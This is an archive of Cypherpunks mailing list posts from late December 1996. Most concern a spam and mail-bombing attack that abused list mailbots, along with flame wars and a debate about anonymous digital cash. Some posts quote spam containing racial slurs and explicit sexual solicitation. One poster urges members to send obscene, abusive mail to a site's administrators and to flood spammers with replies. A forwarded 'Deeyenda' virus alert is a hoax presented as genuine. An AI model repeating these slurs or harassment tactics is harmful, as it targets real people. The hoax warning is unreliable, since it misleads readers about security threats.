From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Thu, 26 Dec 1996 21:15:59 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: RUL_let
In-Reply-To: <3.0.32.19961226182821.006b625c@netcom13.netcom.com>
Message-ID: <Pine.GSO.3.95.961227000920.20811C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Dec 1996, Lucky Green wrote:

> At 08:11 PM 12/26/96 -0500, John Young wrote:
> >
> >"New encryption export rules probably won't be issued until early 
> >next week" 
> >
> >   Rules probably won't be issued until just a day or 2 before they 
> >   go into effect on January 1, officials said Monday.
> 
> Good move on part of the USG. It will keep public discussion to a minimum.
> 
 
An acquaintance of mine moved here from Germany after the war.
She says that, from her family's perspective, the first clear sign
that things were seriously going to hell was that Hitler and his
friends started issuing proclamations, effective almost immediately,
dictating something else you could or could not do.  Later, the
proclamations were made during the night and were effective instantly.

fwiw.

bd






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Dec 1996 21:30:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Ray Arachelian's typical Armenian spam and sabotage
Message-ID: <kTXkZD121w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone should unsubscrive <crypto@uhf.wireless.net> -- apparently Ray's
tentacle that sends whatever it receives back to "cypher punks" (spit).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bubba Rom Dos <bubba@eunuchs.com>
Date: Thu, 26 Dec 1996 22:39:40 -0800 (PST)
To: robroy@flinet.com
Subject: Uncle Rob is going to Jail!
In-Reply-To: <199612270006.TAA21092@shell.flinet.com>
Message-ID: <32C38A4A.4253@eunuchs.com>
MIME-Version: 1.0
Content-Type: text/plain


robroy@flinet.com wrote: 
> Subject:
>         Repair " YOUR OWN " Credit !
>   From:
>         robroy@flinet.com
>     To:
>         pamelabrd.aol.com
>     Cc: samantha@aol.com,junepolk@aol.com,maryphil@aol.com,
>        mariette@aol.com,phylisjc@aol.com
> 
> Dear Little Girl,
>   My name is Uncle Rob.  I have a big, fat, juicy cock.
> Would you like to suck on Uncle Rob's dick?
>   Write me, soon.
> Uncle Rob

Dear 'Uncle Rob',
  I don't know what kind of sick pervert you are, but I have contacted
my service provider, and they are contacting 'your' service provider,
as well as the FBI and the FCC.
  Don't bother replying to this email, as my service provider is
blocking
all of your mailings, forthwith, to this service.  They will be seeing
to it that filth purveyors such as yourself are banished from the WWW.

You Sick Bastard,
BRD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bubba Rom Dos <bubba@eunuchs.com>
Date: Thu, 26 Dec 1996 23:10:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: Re: ANIMAL SEX]
Message-ID: <32C39246.510B@eunuchs.com>
MIME-Version: 1.0
Content-Type: message/rfc822


To: sunshine@kcii.com
Subject: Re: FUCKING CUNT
From: Bubba Rom Dos <bubba@eunuchs.com>
Date: Fri, 27 Dec 1996 01:02:37 -0800
CC: cypherpunks.com
Organization: Circle of Eunuchs
References: <199612262331.SAA04391@server.kcii.com> <32C3583E.175B@sk.sympatico.ca>
Reply-To: bubba@eunuchs.com

sunshine@kcii.com wrote:

> DON'T PAY ANYBODY FOR E-MAIL NAMES!!  You can extract
> your own with our software.
> And if you're not interested in our software, email me privately,
> anyway.  I love to suck dick.  I just can't get enough of it, so
> please, please write me.
> I fuck, suck, swallow, and take it up the ass.  I do animals, too.

Dear 'Sunshine', or 'Yvonne', or whatever your name is,
  I really don't think this is the kind of thing that belongs on
the InterNet.
  I have now seen this posting of yours in three different
conferences, and it is causing quite an uproar.  I think you may
need some kind of professional help.  Please stop posting these
sick messages in the conferences.
  Don't bother replying to this email, because my service provider
has blocked any further postings from you, and has contacted 'your'
service provider and the authorities about your postings.

Please, Get Help,
BRD








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Thu, 26 Dec 1996 23:47:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Skipjack cipher deciphered
Message-ID: <9612270731.AA10007@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Provided without proof:

Skipjack is an elliptic curve cipher.

-Anonymous




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: admin@veracruz.net (Adam Breaux)
Date: Fri, 27 Dec 1996 00:04:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: (Fwd) Re: Bad Idea
Message-ID: <19961227080555694.AAA268@monalisa>
MIME-Version: 1.0
Content-Type: text/plain


Good News Folks!!
-----

As far as I can tell, cypherpunks wasn't subscribed to anything. What
happened instead was someone started forging email in the name of the
list's submission address to various of my mailbots, which simply send
an informational e-mail back.

If they HAD spammed it onto a list, it'd be easier,b ecause I have some
anti-spamming stuff  in place, plus full logging on where requests come
from. I haven't had that on the mailbots before now, because nobody's
done this before that i know of. Guess I'm spending the next few days
closing this loophole...

Sorry for the inconvenience. I'll clean this up as soon as I can, or at
least get logging in place to see where it's coming from, because
honestly, this one's a tough one to fix without just shutting down the
services.

And frankly, if someone's starting to use mailbots to spam, lists are
in big trouble, because there are zillions of those out there. Most
systems, for instance, have "info@xxxxx" addresses, all of which would
do exactly what my mailbots are doing.



chuq

At 5:23 PM -0800 12/26/96, admin@veracruz.net wrote:
>This service is a bad idea...it has been used to e-mail bomb the
>mailing list cypherpunks@toad.com. There was no verification message
>to make sure we wanted to be on this service. Please make an effort to
>correct this immediately.
>
>
>--
>This record generated from address: "206.205.234.41".
>This record generated at "6:22:00 PM" on "Thursday, December 26, 1996".
>
>The browser is "Mozilla/3.01 (Win95; I)" browser.
>The referrer was
>"http://www.plaidworks.com/NetForms.acgi$/ListAdmin/submit.fdml".


--
           Chuq Von Rospach (chuq@solutions.apple.com) Software Gnome
       Apple Server Marketing Webmaster <http://www.solutions.apple.com/>

 Plaidworks Consulting (chuqui@plaidworks.com) <http://www.plaidworks.com/>
   (<http://www.plaidworks.com/hockey/> +-+ The home for Hockey on the net)

I got no name or number/ I just hand out the lumber.
But if I get a chance to play/ I'm going to show 'em.
		-- Stick Boy (The Hanson Brothers, SUDDEN DEATH)



---
Adam Breaux
admin@veracruz.net
http://www.veracruz.net       {Corporate Page }
http://www.abyss.com          {Extracurricular}
http://www.iso-america.com    {In Search Of...}

"Violence is a cruel world doing what it 
does best...break the habit...BE NICE" --- me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 27 Dec 1996 04:24:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Mark Mage is a Thief
In-Reply-To: <32C37D57.2AE4@toad.com>
Message-ID: <1H7kZD124w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Shit F. Brains" <cypherpunks@toad.com> writes:
.about Mark Mage]
>   The guy's a fucking thief, from what I've heard.
>   It seems the FBI is looking for him for a nasty number he
> pulled on some retired people, ripping off their life savings.
> He seems to have the IRS after him, as well.
>   I'd steer clear of him.  He's bad news.

In my opinion, just because the FBI and the IRS don't like someone,
s/he ain't necessarily a bad person.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bubba Rom Dos <bubba@eunuchs.com>
Date: Fri, 27 Dec 1996 02:41:27 -0800 (PST)
To: Fuji4@ix.netcom.com
Subject: Netcom.com is RACIST
In-Reply-To: <199612262312.PAA27812@dfw-ix4.ix.netcom.com>
Message-ID: <32C3C34C.7C45@eunuchs.com>
MIME-Version: 1.0
Content-Type: text/plain


Fuji4@ix.netcom.com wrote:
> EARN EXTRA INCOME NOW!!!!!  WORK AT HOME
> REFER ONLY - NO SELLING $500.-$1000 PER REFERRAL
>
> NIGGERS, KIKES, WOPS, SPICS, AND OTHER 'POND SCUM'
> NEED NOT APPLY!
> NETCOM.COM'S NEW ETHNIC CLEANSING POLICIES FORBID
> EXTENDING THIS OFFERING TO THE 'SLAVE' RACES.

> FOR MORE EXCITING INFORMATION, E-MAIL FUJI4@IX.NETCOM.COM

Dear Fuji4,
  It seems that I can't cruise a conference anywhere, without
seeing the above message emblazoned everywhere.
  Thanks to your efforts, I am sure that your service provider,
netcom.com, will gain much recognition for their new ethnic
cleansing policy.
  I am sure that they will be very thankful to you for your
efforts on getting the word out on their behalf.
-- 
Bubba Rom Dos
"He who shits on the Road, will me flies upon his return."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peggyhn@isp-inter.net
Date: Fri, 27 Dec 1996 02:38:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Want Your Biz To EXPLODE In 1997?
Message-ID: <19961227102324767.AKE64@ppjzako>
MIME-Version: 1.0
Content-Type: text/plain


Fuck_You_Nerds,

Hello and Happy Holidays!

I thought you might be interested in some information to help you build your business to new heights!! It will sure help 1997 to be the VERY best yet!!

I love to bulk email, and I was using Floodgate.  I just loved it!  
Then I came across something brand new that has Floodgate put to shame!  

This software will almost eliminate "flames" by using personalization in the email address, (no more "suppressed" list), putting in their first and/or last name, reminding you when to follow up, extracts addresses from AOL without even having to belong to AOL, plus so much more!  They are even having a HOLIDAY SALE! $100 off regular price until Jan. 5th.
So this is a GREAT time to try out the free demo and see what you think!

For further information, just reply back and ask for "NO FLAME" Info!  I will let you know where you can download the demo and try it for FREE!!

I don't sell this, I just think it's the most awesome online marketing tool I have ever seen! Also, FYI, the seller offers people who have purchased Net Contact a $165 referal fee, so if you are concerned about money, you can get a free auto-responder and use it to  pay for Net Contact!!  
( You will also receive FREE training and support!!  
This is found NO where else!!)

For instant information, email:
star-peggyhendricks-netcontact@nicers.com

Happy Holidays!!
Peggy Hendricks

P.S. Remember the HOLIDAY SALE!  It will be over January 5th!









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 27 Dec 1996 04:28:59 -0800 (PST)
To: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Subject: Fyodor / Re: SPAM from plaidworks.com
In-Reply-To: <Pine.LNX.3.91.961227132549.14770W-100000@freenet.bishkek.su>
Message-ID: <32C3DC4F.BD3@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Fyodor Yarochkin wrote:
> 
> what  the f$%^#$$# shit.. I can not get?.. did some Crazy Idiot >subscirbed cypherpunks to those Sport-Crappy lists?
>  anyone can explain me wuzzup?

Fyodor,
 The webmaster and postmaster at plaidworks.com are lonely and
want you to send them eMail.
  They love it when people talk dirty, so they're hoping that 
when you Reply to their postings, you will change the Subject
heading to contain words like COCKSUCKER, FUCK, CUNT, etc.

> > From: listproc@plaidworks.com
> > Subject: Error Condition Re: Invalid request

   The listproc@plaidworks.com in the Mail To: box when you
Reply to the message needs to be changed.  listproc is just
a mailing daemon that plaidworks.com uses to reply automatically.
   You need to change the Mail To: address box to read
either: postmaster@plaidworks.com
    or: webmaster@plaidworks.com
(or put one of them in the Mail To: box, and the other address
in the Cc: box)
   And don't forget to put FUCKING IDIOTS in the Subject: box.

Toto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 27 Dec 1996 04:59:19 -0800 (PST)
To: John H West <jwest@eskimo.com>
Subject: CypherSpamming
In-Reply-To: <199612270006.TAA21092@shell.flinet.com>
Message-ID: <32C3E47A.2917@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


John H West wrote: 
> I encourage that everyone who gets spam like that which follows
> forward the original message BACK TO THE SENDER (several times)

John,
  I'm going to sit down and write a couple dozen 'generic' response
letters of varying descriptions and lengths, leading these people
on as if I'm interested in their tripe, but ending with a message
that tells them to 'piss off', in various forms.
  I will keep them in a handy directory for 'replying' to their
spamessages.
  The greater the number of letters, and the more varied they are,
then the more these fucks will have to spend their time and energy
sorting through them.  So if any CypherPunks wish to contribute to
my SpamReply Database of 'Interested in your offer....FUCKHEAD!'
offerings, send them to me by email.
  When I get it all set up, I'll make it available to any CypherPunk
who wants to use them.  I think if the CypherPunks all spent just
a few days replying to these spamessages thirty or forty times apiece,
that they would soon find other waters to cast their bread upon.

Toto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 27 Dec 1996 05:27:14 -0800 (PST)
To: admin@veracruz.net
Subject: Re: (Fwd) Re: Bad Idea
In-Reply-To: <19961227080555694.AAA268@monalisa>
Message-ID: <32C3E828.608B@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Adam Breaux wrote:
> As far as I can tell, cypherpunks wasn't subscribed to anything. What
> happened instead was someone started forging email in the name of the
> list's submission address to various of my mailbots, which simply send
> an informational e-mail back.

  If cypherpunks wasn't subscribed to anything, then why did I get
50 million messages about sports in my mailbox?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 27 Dec 1996 05:25:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: CypherRevenge
In-Reply-To: <19961227080555694.AAA268@monalisa>
Message-ID: <32C3EA75.1754@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Adam Breaux wrote:
 
> And frankly, if someone's starting to use mailbots to spam, lists are
> in big trouble, because there are zillions of those out there. Most
> systems, for instance, have "info@xxxxx" addresses, all of which would
> do exactly what my mailbots are doing.

  Well, I certainly hope that nobody uses this information to subscribe
others to a zillion lists.  Especially not the authors of such classics
as, "EASY MONEY!!!", "MAKE $$$ AT HOME", etc.
  I would hate for these people to be too busy to send me "IMPORTANT
INFORMATION ABOUT HOW 'YOU' CAN MAKE $$$ AT HOME, LICKING YOUR OWN
DICK!!!"

Toto
p.s. - for a limited time--offer open to CypherPunks only--anyone 
who sends me $20.00 will receive my special 'Secret Magic Chant',
which effectively blocks unwanted eMail.
  (This offer includes a clear Title to a bridge in the New York 
City area--absolutely free!)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 27 Dec 1996 06:24:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Forged addresses
Message-ID: <v0300784daee974a92a6d@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Fri, 27 Dec 1996 00:01:40 -0800
From: Chuq Von Rospach <chuqui@plaidworks.com>
Subject: Re: Forged addresses
To: listmom-talk@skyweyr.com
Mime-Version: 1.0
Precedence: Bulk
Reply-To: listmom-talk@skyweyr.com

At 8:55 PM -0800 12/25/96, Joshua D. Baer wrote:

>Do you mean that new subscribers will not be allowed to post until they get
>personal "approval" from the listmaster?  What lists would you implement
>this on?  I'd be worried about scaring new people off... it might make
>people afraid to post.

Actually, a two-level beast. *All* lists become moderated. Every
posting that's not from a validated moderator therefore goes to the
moderator for approval. If someone on the list wants to post without
delays, they can become moderated, thereby becoming a "moderator".
Users don't have to -- but put up with posting delays until the
moderator comes into the loop.

It's somewhat more work for me as moderator. It's a significantly
reduced noise level for the list. It forces a positive acceptance of
the list rules before someone can post to the list, so this "stupidity
by ignorance" goes away -- it also stops the subscribe-and-spam hit and
runs, of which I've been nailed by two this month (those are new.
Spammers traditionally haven't been smart enough to subscribe, so the
non-subscriber limitation has nuked them. These two subscribed, then
one set up an auto-bot on his address to respond to every bloody
message on the lists with his ad -- to the list. 90 messages later...
The other guy just subscribed and started blatting. Both, once I had
chats with their postmasters and webmasters, found themselves no longer
with email or web addresses, but...)

It has, literally, gotten to the point where I can no longer assume
that someone can:

a) type in their email address correctly.
b) read instructions.
c) follow instructions.
d) behave.

so I'm having to revamp my systems to protect them from this new
class(es) of internet user. The days of laissez-faire administration
are dead. The braindead, the novice blunderer and the spammer have
killed them.

Sad but true.

So to cut out the Spammers and the folks who have no clue what their
email is, my systems will be going to the
confirmation-reply-before-subscribe setup. The bogus addresses will
bounce before subscription, and the spammers will only be able to send
them single pieces of e-mail, not sign them up. It's *more* hassle for
end-users and reduces ease of use, but sometimes, you have to make
things a little tougher for the good of everyone. You can make things
too easy, and unfortunately, things are too easy for the spammers, so
everyone has to suffer a little bit to put THOSE idiots back in the
sewer (while I was gone, there was a major spam attack using
plaidworks, to the tune of about 25 addresses. Fairly sophisticated in
some ways, but mostly, they knew when I wasn't looking and got around
my traps. We're backtracking them as we speak, but in one case, they
seem to have broken into a machine to send the spam attack, so it'll be
tough...)

And to cut out the babblers and other idiots who don't believe they
need to behave, be polite, follow rules or whatever, I'm going to make
all lists moderated, and then extend moderation priviledges to the
"trusted" set of users. That's one way of pulling this off without
having to rewrite the list servers, as long as they support multiple
moderators.

Oh, and on the topic of spammers, here's a warning: some of the
spammers seem to have a new, amusing hack: they're forging email aimed
at MAILBOTS (like info@plaidworks.com -- and doesn't just about *every*
site have at least one mailbot these days?) such that the bot responds
to the person being spammed. This one's fairly noxious, because there's
no subscription or anything, and generally no address validation (how
can you validate addresses coming to a mailbot? Um, you can't,
basically), and I don't know about you, but I don't log mailbot
requests. Well, I will starting tomorrow...

Anyway -- if you have mailbots, be aware that people might be starting
to use them as attacks, also. It requires more work from them, given
that mailbots only send one message per incoming, but if you can build
a script that sends mail to 1,000 sites and their info@ address, I'm
not sure the person being spammed will realize that it could have been
*worse*.

And suggestions on how to continue to make mailbots available AND make
them reasonably safe encouraged. Logging incoming so you can backtrack
headers and try to nail the spammer is at least one way to keep it
relatively honest, but I'd rather stop it than patch it together again.
That gets tired...


--
           Chuq Von Rospach (chuq@solutions.apple.com) Software Gnome
       Apple Server Marketing Webmaster <http://www.solutions.apple.com/>

 Plaidworks Consulting (chuqui@plaidworks.com) <http://www.plaidworks.com/>
   (<http://www.plaidworks.com/hockey/> +-+ The home for Hockey on the net)

I got no name or number/ I just hand out the lumber.
But if I get a chance to play/ I'm going to show 'em.
		-- Stick Boy (The Hanson Brothers, SUDDEN DEATH)

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox,
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 27 Dec 1996 06:26:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Forged addresses
Message-ID: <v0300784eaee975274827@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Fri, 27 Dec 1996 00:24:51 -0800
From: Chuq Von Rospach <chuqui@plaidworks.com>
Subject: Re: Forged addresses
To: listmom-talk@skyweyr.com
Mime-Version: 1.0
Precedence: Bulk
Reply-To: listmom-talk@skyweyr.com

At 12:53 PM -0800 12/26/96, Kass Johns wrote:

>I only joined this listserv a few days ago, and suddenly, I got (on
>Christmas Eve), about 25 (assumed) bogus subscribers. I had never had any
>bogus ones before.

well, *that* sounds familiar. Same time, same size... do any of these
sites sound familiar? isp-inter.net? softcell.net? superhot.com?
mid-night.com? strutyourstuff.com?

I'll bet they do... A lot of what got spammed onto my sites were
various forms of internet commerce (superhot.com is net-porn-chat or
some such, at least two of the others are unsolicited email houses.
strutyourstuff is a pretty noxious one, from what little I saw of what
they're doing. A pox on all their houses, so to speak, but don't do it
with my server, dammit...)

But that wasn't it. Someone got mad at the cypherpunks, and spammed
their list. And for some godawful reason, the webcrawler admin lists.
Someone -- possibly two someones -- were making some interesting
political statements....

This christmas eve spam was pretty well planned. It seems to have been
exceptionally widespread, aimed at some segments of the internet
certain high-and-righteous types find unacceptable, and issued at a
time when it was pretty much guaranteed nobody was watching the servers
too closely. And it seems pretty widespread in the number of servers
hooked into the spam.

>My thought is, is there someone who
>is lurking among this group who just lies in wait for new folks to
>subscribe and add their list to their sick little spamming game?

Well, if I were trying to build lists of places to send spam mail from,
this is one place I'd watch. That's why, if you don't mind, I won't go
into details about my anti-spamming traps in public here. Except in
generalities. I've learned to just assume that they're watching. Of
course, with any luck they'll figure out I have full logging of the
information needed to catch spammers, too, and not take chances with
me, because I don't take prisoners...

Oh, heck. Gotta run. As I type, the cyberpromo folks are trying to log
onto my lists again and setting off my alarms.

Oh, before I go, a note on those folks. Make sure that under no
circumstances you allow any addresses from:

cyberpromo.com
cybercastle.com

onto your lists. These are folks that will happily sign onto your
lists, suck the addresses of people posting to your lists, and add them
to their cyberspam mass mailings. These are also the folks AOL's been
fighting in court. No ethics, and don't even bother trying to talk to
them. Just keep them out. They may be using a third domain these days,
but I've caught them sneaking onto lists from various accounts in both
domains. Just lock the entire puppy out. That way, they can't spam your
lists, and can't suck your lists out and spam them away from your
server. You *do* have subscriber lists kept private on your server,
right? Nobody can get them, right?






--
           Chuq Von Rospach (chuq@solutions.apple.com) Software Gnome
       Apple Server Marketing Webmaster <http://www.solutions.apple.com/>

 Plaidworks Consulting (chuqui@plaidworks.com) <http://www.plaidworks.com/>
   (<http://www.plaidworks.com/hockey/> +-+ The home for Hockey on the net)

I got no name or number/ I just hand out the lumber.
But if I get a chance to play/ I'm going to show 'em.
		-- Stick Boy (The Hanson Brothers, SUDDEN DEATH)

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox,
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 27 Dec 1996 07:21:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Vulis strikes again?
In-Reply-To: <Pine.3.89.9612262137.A12346-0100000@netcom14>
Message-ID: <39oLZD125w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Z.B." <zachb@netcom.com> writes:

> On Thu, 26 Dec 1996, Ray Arachelian wrote:
>
> > wheee, looks like KOTM subscribed us to a shitload of mailing lists...
> > Having fun Herr Doktor?
> >
> Not only that, but he's probably posting those messages that begin with
> Fuck_You_Nerds...those appear regularly on alt.revenge, where he is a
> semi-frequent poster.

Of course, idiot "cypher punks" Zach and Ray are lying again, as usual.

Of course, cocksucker John Gilmore is an even bigger lying idiot.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rsampson@microsyssolutions.com
Date: Fri, 27 Dec 1996 10:34:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: For your information
Message-ID: <Ready Aim Fire!_12/27/96 1:33:00 PM_rsampson@microsyssolutions.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

After seeing some of your newsgroup postings, I may have something that will interest you.  If you're not interested, just delete this message.  This will be the only message you will receive.

$$$ GET ATTENTION FOR YOUR PRODUCT OR MESSAGE $$$

It's an application called Ready-Aim-Fire for Windows 95. It will connect to your news server, download the Email addresses of all the people posting messages to that group (or groups), and Email your message to all those addresses.  

Ready-Aim-Fire will get your product or message out of the crowd and into your customers' hands.  Ready-Aim-Fire will deliver your message right to their door, so to speak.  If you post a message to a business oriented newsgroup it's stuck right in the middle of hundreds of others.  A prospective customer may look in once in a while, or only once, and you'll miss him.  With Ready-Aim-Fire you can focus on the persons in the group who are most interested in the subject.  That is, the people who post the messages.  The great part is the price!  It's only $39.95.

If you would like more information send an email to:
                   info@microsyssolutions.com 

or visit our web site at:
                   http://www.microsyssolutions.com/raf

Thanks,
Ron Sampson
rsampson@microsyssolutions.com
Ready Aim Fire!
Marketing Director






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Fri, 27 Dec 1996 08:41:34 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: cryptoanarchy
In-Reply-To: <Pine.LNX.3.95.961224182704.3135A-100000@jolietjake.com>
Message-ID: <199612271638.KAA03014@bigeasy.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


> >Brutality amongst human beings has little to do with what type of
> >government (or lack thereof) we have established.
> 
> bzzzzzzt, history readily denies this.
> 
>   Nor is brutality
> >inevitable amongst human beings; governments have little or no
> >affect on how individuals think and behave.
> 
> bzzzzzt, history readily denies this. but again it is amusing to see
> the patently incorrect assertions that cryptoanarchists embrace and
> flout.
> 
> >1) Do you agree that these things are an inevitable consequence of
> >anonymous untraceable payment systems?
> 
> murder, assassination, kidnapping, they all already exist. 

Exactly my point.  I believe interactions between individuals have 
far more to do with our (dis)inclinations towards brutal behavior 
that governments do.  Governments have little influence over human 
attitudes.

> I am
> dubious that the existence of anonymous payments will change much in
> this area. I don't think it will become any more prevalent. what TCM

I agree, actually.  I don't see an increase in these types of crimes 
because of the existence of anonymous payment methods.  What TCM and 
others have argued is that getting away with these crimes will be 
much easier due to anonymous payment schemes.

I would argue that anonymous payment protocols are not necessarily 
any easier for the foolish criminal to fuck up than current methods 
of payment for, ahem, services rendered.

Only if untraceable anonymous digital cash becomes a ubiquitous 
(and easy-to-utilize) standard will such crimes be more difficult to 
catch.  (TCMay says only one such system is necessary.  I disagree 
and will get back to this point in a later message)

> seems to imply in much of his writing, but fails to outrightly
> assert because he's such a weasel, is that the world would be a
> *better*place* with all these things, which I vehemently reject.

I think you're reading a little more into it than is there, but 
that's your perogative.
 
> I'm in favor of anonymous cash, but
> I am also in favor of social/legal mechanisms to minimize its
> subversive impact. note that "not dealing with kidnappers or
> terrorists" is one such approach that does not involve police.

I'm not in favor of legal mechanisms.  I think social mechanisms are 
all but inevitable. (more on this later) I don't think it's necessary 
or even desirable to build in orwellian schemes.  

The government's desire to limit untracability has far more to do 
with taxation than the four horsemen scenario.  Yes, I've heard of 
memes.

me
--------------------------------------------------------------
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                        59 0A 01 E3 AF 81 94 63 
Send a message with the text "get key" in the 
"Subject:" field to get a copy of my public key.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tedk <tpk@sensorsys.com>
Date: Fri, 27 Dec 1996 13:04:14 -0800 (PST)
To: gpk@research.bell-labs.com
Subject: "Deeyenda" E-MAil virus alert!!!!!!
Message-ID: <1.5.4.32.19961227150154.00716578@pop.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


 To:  ALL

From: Ted Kochanski

Re:  "Deeyenda"  E-MAIL Virus ALERT

#: 2456 S0/CompuServe Mail  [MAIL]
     20-Dec-96 20:23 EST
 Sb: Virus Alert
 Fm: Art Ellingsen > INTERNET:artell@ix.netcom.com
 To: Robert M. Avallone [70733,1707]


Dear ALL: 
 
I apologize if I happen to send this two you more than once.  If so it was 
not intentional. 
 
I received this warning from a reliable software vendor and thought I 
would pass it on to you and wish you a Merry Christmas too. 
 
 
**********************VIRUS ALERT************************************ 
 
        VERY IMPORTANT INFORMATION, PLEASE READ! 
 
There is a computer virus that is being sent across the Internet.  If 
you  receive an E-Mail message with the subject line "Deeyenda", DO NOT 
read the message, DELETE it immediately! 
      
Some miscreant is sending E-Mail under the title "Deeyenda" nationwide, 
if you get anything like this DON'T  DOWNLOAD THE FILE!  It has a virus 
that rewrites your hard drive, obliterates anything on it.  Please be 
careful and forward this E-Mail to anyone you care about. 
      
Please read the message below. 
      
FCC WARNING!!!!! -----DEEYENDA PLAGUES INTERNET 
      
The Internet community has again been plagued by  another computer 
virus. This message is being spread throughout the Internet, including 
USENET posting, E-MAIL, and other Internet activities. The reason for 
all the attention is because of the nature of this virus and the 
potential security risk it makes.  Instead of a destructive Trojan virus 
(like most viruses!), this virus referred to as Deeyenda Maddick, 
performs a comprehensive search on your computer, looking for valuable 
information, such as E-Mail and login passwords, credit cards, personal 
inf., etc. 
      
The Deeyenda virus also has the capability to stay memory resident while 
running a host of applications and operation systems, such as Windows 
3.11 and Windows 95.  What this means to Internet users is that when a 
login and password are send to the server, this virus can copy this 
information and SEND IT OUT TO UN UNKNOWN ADDRESS (varies). 
      
The reason for this warning is because the Deeyenda virus is virtually 
undetectable.  Once attacked your computer will be unsecured.  Although 
it can attack any O/S this virus is most likely to attack those users 
viewing Java enhanced Web Pages (Netscape 2.0+ and Microsoft Internet 
Explorer 3.0+ which are running under Windows 95).  Researchers at Princeton 
University have found this virus on a number of World Wide Web pages and 
fear its spread. 
      
Please pass this on, for we must alert the general public of the 
security risks. 
 
Steven Chevalier 
Vice President Distribution 
VersaNet International 
******************************** 
 


Art
                        Ted
***************************************************************************
Ted Kochanski, Ph.D.
Sensors Signals Systems  ---  "Systematic Solutions to Complex Problems"
http://www.sensorsys.com
e-mail tpk@sensorsys.com   phone (617) 861-6167  fax  861-0476
11 Aerial St., Lexington, MA 02173

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
